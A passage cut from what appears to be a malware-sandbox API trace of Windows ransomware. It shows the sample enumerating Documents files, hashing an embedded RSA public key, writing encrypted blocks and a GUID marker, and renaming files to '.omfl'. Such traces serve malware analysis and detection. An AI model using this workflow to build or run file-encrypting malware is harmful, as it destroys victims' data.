KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.947] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0130.948] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.948] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.948] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.948] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.948] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.948] GetLastError () returned 0x0 [0130.948] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.948] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0130.948] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.948] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.948] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.948] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.949] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.950] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1185b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.950] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.950] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.950] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.950] CloseHandle (hObject=0x5c8) returned 1 [0130.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0130.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.952] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ng8zuNrApbC E.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ng8zunrapbc e.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ng8zuNrApbC E.xlsx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ng8zunrapbc e.xlsx.omfl")) returned 1 [0130.955] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb143ff60, ftCreationTime.dwHighDateTime=0x1d5e01b, ftLastAccessTime.dwLowDateTime=0x3b7aa510, ftLastAccessTime.dwHighDateTime=0x1d58493, ftLastWriteTime.dwLowDateTime=0x3b7aa510, ftLastWriteTime.dwHighDateTime=0x1d58493, nFileSizeHigh=0x0, nFileSizeLow=0x2993, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nod5KjB4R6c.pptx", cAlternateFileName="NOD5KJ~1.PPT")) returned 1 [0130.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5b50 [0130.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0130.955] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nod5KjB4R6c.pptx") returned=".pptx" [0130.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nod5KjB4R6c.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nod5kjb4r6c.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.955] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=10643) returned 1 [0130.955] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.958] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x296d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.958] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.960] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x2993, lpOverlapped=0x0) returned 1 [0130.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.960] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0130.961] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.961] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.961] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.961] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.961] GetLastError () returned 0x0 [0130.961] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.962] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0130.962] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.962] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.962] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.962] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.963] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x2993, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.963] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.963] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.963] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.963] CloseHandle (hObject=0x5c8) returned 1 [0130.964] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0130.964] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.964] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nod5KjB4R6c.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nod5kjb4r6c.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nod5KjB4R6c.pptx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nod5kjb4r6c.pptx.omfl")) returned 1 [0130.966] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a76fa30, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0x1f2b7520, ftLastAccessTime.dwHighDateTime=0x1d5e2d9, ftLastWriteTime.dwLowDateTime=0x1f2b7520, ftLastWriteTime.dwHighDateTime=0x1d5e2d9, nFileSizeHigh=0x0, nFileSizeLow=0x12225, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ONQxwUE ucU-gmTaxkP.doc", cAlternateFileName="ONQXWU~1.DOC")) returned 1 [0130.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5b50 [0130.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0130.967] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ONQxwUE ucU-gmTaxkP.doc") returned=".doc" [0130.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ONQxwUE ucU-gmTaxkP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\onqxwue ucu-gmtaxkp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.967] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=74277) returned 1 [0130.967] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.970] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x121ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.970] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.972] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.972] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x12225, lpOverlapped=0x0) returned 1 [0130.972] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.972] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.972] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.973] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0130.974] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.974] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.974] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.974] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.974] GetLastError () returned 0x0 [0130.974] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.974] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0130.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.974] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.974] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.974] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x12230) returned 0xdd35410 [0130.975] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd346b0 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e30 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd346f8 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e48 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e78 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e90 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.975] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e78 | out: hHeap=0x4970000) returned 1 [0130.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e90 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e90 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16e78 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e90 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e78 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0130.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.976] GetCurrentThreadId () returned 0x618 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2c850 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.977] GetCurrentThreadId () returned 0x618 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, 